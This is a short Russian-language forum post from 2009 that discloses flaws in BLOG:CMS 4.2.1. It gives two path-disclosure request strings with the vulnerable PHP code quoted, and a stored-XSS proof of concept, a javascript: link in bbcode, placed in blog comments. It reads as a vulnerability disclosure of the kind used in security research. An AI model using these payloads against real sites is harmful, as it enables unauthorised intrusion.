Показать сообщение отдельно

BLOG:CMS 4.2.1
  #7  
Старый 08.11.2009, 06:03
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию BLOG:CMS 4.2.1

BLOG:CMS v4.2.1
Раскрытие путей
Цитата:
/?query[]=1234&blogid=1
Уязвимой код:
PHP код:
$this->formdata = array(
            
'id' => $blog?$blog->getID():$CONF['DefaultBlog'],
            
'query' => htmlspecialchars(getVar('query')),
        ); 
Цитата:
/photo/index.php?gallery[]=Corvette
Уязвимый код:
PHP код:
$_REQUEST array_map("htmlentities"$_REQUEST); 
Активная XSS
Уязвимость находиться в комментариях к блогу (Его записям).
Цитата:
[a href=javascript:alert();]Free Porno![/a]
 
Ответить с цитированием